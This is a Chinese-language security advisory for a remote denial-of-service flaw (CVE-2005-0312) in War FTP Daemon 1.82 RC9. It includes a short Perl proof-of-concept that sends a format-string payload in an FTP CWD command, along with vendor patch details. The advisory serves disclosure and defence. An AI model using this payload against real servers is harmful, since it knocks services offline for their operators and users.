War FTP Daemon远程拒绝服务漏洞
信息来源:MC.Iglo (mc.iglo@gmx.de) 发表日期:2013-11-15 11:42:00
War FTP Daemon是Jgaa的FTP程序。
War FTP Daemon 1.82.00-RC9作为NT服务运行时,远程经过身份验证的用户通过带特制路径名的CWD命令,利用此漏洞可造成拒绝服务。
BUGTRAQ-ID:12384
CVE-ID:2005-0312
受影响系统:
Jgaa War FTP Daemon 1.82 RC9
Jgaa War FTP Daemon 1.8
未受影响系统:
Jgaa War FTP Daemon 1.82 RC10
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar
use strict;
use Net::FTP;
my $payload="%s"x115;
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@123.com");
$ftp->quot("CWD",$payload);
解决办法:
厂商补丁:
Jgaa
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=3
参考信息:
http://xforce.iss.net/xforce/xfdb/19129